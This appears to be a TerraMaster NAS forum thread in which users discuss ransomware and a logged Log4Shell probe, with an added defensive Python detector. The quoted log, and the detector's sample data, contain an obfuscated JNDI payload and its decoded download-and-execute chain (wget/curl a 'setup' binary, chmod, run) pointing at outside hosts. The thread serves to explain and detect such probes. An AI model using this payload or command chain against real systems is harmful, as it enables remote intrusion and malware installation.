REBELinBLUE wrote:
>
people should not try. The question is, if it is vulnerable, what happens afterwards?
Will they attack? It is as if I try to force the door of your house to see if a thief can enter.
But look at this log here.
*********************
OTHERS. MORE ATTACKS
*********************
******************************************
IP Address Local: 165.232.155.141
ISP Web: 108.161.168.xxx >------------->>>> My IP Address
Host Local: 165.232.155.141
Date: 11/01/2022 21:21:46
Port Number: 37564
Operating System: Unknown operating system
User Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}')
HTTP Referer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}')
******************************************
HTTP Referer: Base64 decoded
/TomcatBypass/Command/Base64/>---->>>> wget http://158.101.118.236/setup; curl -O http://158.101.118.236/setup; chmod 777 setup; ./setup exploit
IP Address: ISP Digital Ocean, LLC = 165.232.155.141
IP Address: ISP Digital Ocean, LLC = 137.184.40.48
The question is: are big companies dedicated to making attacks on servers, looking for I don't know what?
This is weird.
Urgent Notification about TNAS being Attacked by Ransomware
Re: Urgent Notification about TNAS being Attacked by Ransomware
LaMosca wrote:
> IP Address: ISP Digital Ocean, LLC = 165.232.155.141
>
>
> IP Address: ISP Digital Ocean, LLC = 137.184.40.48
>
> The question is. Big companies are dedicated to making attacks? on the servers
> looking for I don't know what?
>
> this is weird.
Not so weird.
DigitalOcean provide rentable cloud servers, so it is someone who hosts a server on DigitalOcean that is attacking you.
I host a server on DigitalOcean, though just for hosting a website.
Report it to DigitalOcean and I am sure the client will have their server removed.
DigitalOcean (referral)- https://m.do.co/c/968520215356
- REBELinBLUE
- Posts: 30
- Joined: 05 Dec 2021, 06:37
Re: Urgent Notification about TNAS being Attacked by Ransomware
LaMosca wrote:
> REBELinBLUE wrote:
> >
>
> people should not try. The question is, if it is vulnerable, what happens afterwards?
>
> Will they attack? It is as if I try to force the door of your house to see if a thief
> can enter.
I honestly have no idea what you are saying...
As I said, the log shows someone trying a log4j exploit, which doesn't impact the TNAS. Any server connected to the public Internet will show things like this: people looking for wp-admin, various .NET exploits etc. It doesn't mean they are exploitable, it means someone was looking to see if they were.
- Charlie_Croker
- Posts: 105
- Joined: 07 Oct 2020, 19:05
Re: Urgent Notification about TNAS being Attacked by Ransomware
LaMosca wrote:
>
It's often not someone trying to hack your network, it's a "bot". These bots crawl the web probing ports looking for vulnerabilities, and some of these aren't bad actors; they're reputable companies looking to discover how many devices have unpatched vulnerabilities. For example, my Intrusion Protection System (IPS) reports this address so often that I asked them to remove my WAN IP from the ones they scan. (Their IP is 146.88.240.4 and you can see I am not alone in noticing this: https://www.abuseipdb.com/check/146.88.240.4; the company is actually https://www.netscout.com)
Even hackers don't often pick an IP at random and then try to hack it (well, unless you're a bank, the NSA, CIA etc.); they send a bot out to find any IPs which might be vulnerable and then use scripts to try to run exploits. This probably happened with the Terramaster and Qlocker attacks: it wasn't someone sat at a PC encrypting your files, it was just a script kiddie :)
As REBELinBLUE said, in your case it looks to be a bot looking for possible unpatched Log4J https://www.ncsc.gov.uk/information/log ... ds-to-know
More on Bots here https://www.hindawi.com/journals/scn/2017/5960307/
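Editor's note, added example. The two posts above (REBELinBLUE's reading of the log as a log4j probe, and Charlie_Croker's point that it is a bot sweeping for unpatched Log4J) are easier to act on with a small detector, so here is one. It is not code from this thread or from TerraMaster. It undoes the nested-lookup obfuscation seen in the User-Agent above (`${env:NaN:-j}ndi...`) with a hand-written approximation of Log4j's lookup rules covering only the `${prefix:key:-default}`, `${::-x}`, `${lower:x}` and `${upper:x}` forms, which are the ones scanners commonly use; it is not Log4j's real interpolator. It then pulls out the attacker's JNDI callback and decodes the `/Command/Base64/` segment the way the poster did by hand. The sample log lines are constructed for the example: the first reuses the User-Agent from the log above, the second uses the documentation address 203.0.113.7 (not a real attacker), and the third is a harmless wp-admin probe.

```python
"""Spot Log4Shell (CVE-2021-44228) probes in web-server log lines even when the
${jndi:...} string is hidden behind nested Log4j lookups, and recover the shell
command that JNDI exploit kits carry in a /Command/Base64/<blob> path."""
import base64
import binascii
import re
from typing import List, Optional, Tuple

# One Log4j lookup with no other ${...} nested inside it; resolved innermost-first.
_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A jndi: reference using the schemes JNDI exploit servers commonly answer on.
_JNDI = re.compile(r"""jndi:(ldaps?|rmi|dns|iiop|corba|nds|http)://([^\s'"}]+)""", re.I)
# Exploit-kit convention seen in the log above: .../Command/Base64/<base64 command>
_B64_PATH = re.compile(r"(?:^|/)Base64/([A-Za-z0-9+/=_-]+)")


def _resolve_one(body: str) -> str:
    """Evaluate a single lookup the way the obfuscation tricks rely on (approximation)."""
    if body.lower().startswith("jndi:"):
        return "${" + body + "}"      # keep the JNDI lookup itself for the detector
    if ":-" in body:
        # ${env:NaN:-j}, ${sys:x:-j}, ${::-j}: the lookup fails (or is empty), so
        # Log4j substitutes the default text after ':-'.
        return body.split(":-", 1)[1]
    prefix, _, arg = body.partition(":")
    if prefix.lower() == "lower":
        return arg.lower()
    if prefix.lower() == "upper":
        return arg.upper()
    return "${" + body + "}"          # unknown lookup with no default: left as is


def deobfuscate(text: str, max_rounds: int = 64) -> str:
    """Resolve innermost lookups repeatedly until the text stops changing."""
    for _ in range(max_rounds):
        resolved = _LOOKUP.sub(lambda m: _resolve_one(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def decode_command(path: str) -> Optional[str]:
    """Decode the Base64 command segment of an exploit-kit path, if present."""
    m = _B64_PATH.search(path)
    if not m:
        return None
    blob = m.group(1).replace("-", "+").replace("_", "/")   # accept URL-safe alphabet
    blob += "=" * (-len(blob) % 4)                          # tolerate stripped padding
    try:
        return base64.b64decode(blob).decode("utf-8", "replace")
    except binascii.Error:
        return None


def scan_log_line(line: str) -> Optional[dict]:
    """Return details of a Log4Shell probe in the line, or None if it is clean."""
    m = _JNDI.search(deobfuscate(line))
    if not m:
        return None
    scheme, rest = m.group(1).lower(), m.group(2)
    host, _, path = rest.partition("/")
    return {
        "scheme": scheme,
        "callback": host,                   # the attacker's JNDI server, host:port
        "path": path,
        "command": decode_command(path),    # None when the path carries no command
    }


def scan_log(lines: List[str]) -> List[Tuple[int, dict]]:
    """Return (line number, finding) for every probing line."""
    findings = []
    for number, line in enumerate(lines, 1):
        found = scan_log_line(line)
        if found:
            findings.append((number, found))
    return findings


# Constructed sample in Apache combined-log shape: the User-Agent from the log
# above, a second obfuscation style pointing at a documentation address
# (203.0.113.7, not a real attacker), and a benign wp-admin probe.
SAMPLE_LOG = [
    '165.232.155.141 - - [11/Jan/2022:21:21:46 +0100] "GET / HTTP/1.1" 200 612 "-" '
    '"t(\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//137.184.40.48:1389'
    '/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1P'
    'IGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}\')"',
    '198.51.100.23 - - [11/Jan/2022:21:30:02 +0100] "GET /?x=${${lower:j}${upper:n}di:'
    '${lower:ldap}://203.0.113.7:1389/o} HTTP/1.1" 400 0 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [11/Jan/2022:21:31:10 +0100] "GET /wp-admin/ HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, found in scan_log(SAMPLE_LOG):
        print(f"line {number}: {found['scheme']}://{found['callback']} command={found['command']!r}")
```

Run it as-is and it reports the first two lines only; the third (the wp-admin probe Charlie_Croker mentions) is noise of a different kind and is ignored. The callback host:port is what you would report to the hosting provider, and the decoded command (here the wget/curl/chmod/./setup chain from the log) tells you what the probe would have done on a vulnerable host. Because lookups are resolved innermost-first and the JNDI reference is kept literal, the same code also handles the `${${::-j}${::-n}${::-d}${::-i}:...}` style; other Log4j lookups (date, sys without a default, and so on) are left unresolved, so a miss there is a false negative, not a crash.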
- REBELinBLUE
- Posts: 30
- Joined: 05 Dec 2021, 06:37
Re: Urgent Notification about TNAS being Attacked by Ransomware
Fair point, hadn't thought about it possibly just being a reputable organisation "just looking" as it were
https://www.abuseipdb.com/check/158.101.118.236
- Charlie_Croker
- Posts: 105
- Joined: 07 Oct 2020, 19:05
Re: Urgent Notification about TNAS being Attacked by Ransomware
It seems those of us who are QNAP users have discovered another new Ransomware exploit in the last 24 hours, called "Deadbolt" https://forum.qnap.com/viewtopic.php?f= ... 7&start=15 (Thanks to my Firewall, so far I have not been attacked successfully yet!).
Be careful people,
- Charlie_Croker
- Posts: 105
- Joined: 07 Oct 2020, 19:05
Re: Urgent Notification about TNAS being Attacked by Ransomware
And more on Deadbolt (QNAP exploit for now). But hopefully one TM is aware of and ensuring it's not an exploit on TM devices https://www.reddit.com/r/qnap/comments/ ... nst_qnaps/
- crisisacting
- Posts: 261
- Joined: 20 Jan 2022, 16:42
Re: Urgent Notification about TNAS being Attacked by Ransomware
There's another … CVE-2021-4034 (PwnKit): https://www.bleepingcomputer.com/news/s ... -released/
As this affects most Linux distributions, openWRT is likely impacted as well.
Re: Urgent Notification about TNAS being Attacked by Ransomware
crisisacting wrote: 27 Jan 2022, 03:26
> There's another … CVE-2021-4034 (PwnKit): https://www.bleepingcomputer.com/news/s ... -released/
> As this affects most Linux distributions, openWRT is likely impacted as well.
pkexec has not been used in TOS.
To contact our team, please send email to following addresses, remember to replace (at) with @:
Support team: support(at)terra-master.com (for technical support only)
Service team: service(at)terra-master.com (for purchasing, return, replacement, RMA service)
- peter.horsley
- Posts: 3
- Joined: 22 Feb 2021, 08:44
Re: Urgent Notification about TNAS being Attacked by Ransomware
Short version: I see the word "ransomwar" (no e) in the HDMI console of a fresh install of TOS, downloaded from the official website. I took a photo of it which you can see via the link below. Can anyone explain this?
https://www.dropbox.com/s/vp31acfsneabs ... r.jpg?dl=0
Long version:
I noticed there was kinsing miner evidence on my NAS, and then started seeing files getting created, including a readme.txt stating "All files are gone" with my email address, so it looks like a ransomware attack was in progress. I was shocked to find out about UPnP default settings that mean the NAS is accessible from the public internet. I have now disabled UPnP on my router.

Then I took out all HDDs, put them in another computer and deleted all partitions. Then I tried to boot TNAS again but it failed to get an IP address. So I plugged in HDMI and noticed it was stuck trying to boot off the internal USB. So I found the instructions on how to re-image the USB drive and, after several unsuccessful attempts, I found the Dropbox link to the bzImage archive which did work (after changing grub-install to grub2-install in make_install). Once booted, I went to initialize, inserted HDDs, but it failed to install the latest TOS image 4.2.28 at 55%. I tried the 2nd latest image 4.1.27 and it succeeded.

All this time I had the HDMI plugged in to monitor progress. I noticed the word "ransomwar" appear as shown in the above photo on boot of 4.1.27, which is highly concerning considering this is a freshly imaged USB and freshly initialized TOS downloaded today with blank HDDs inserted. After upgrading to 4.2.28, I don't see that message on boot in the console anymore. It makes me wonder whether the official 4.1.27 contains ransomware!!
Can support please explain what is shown in the photo please?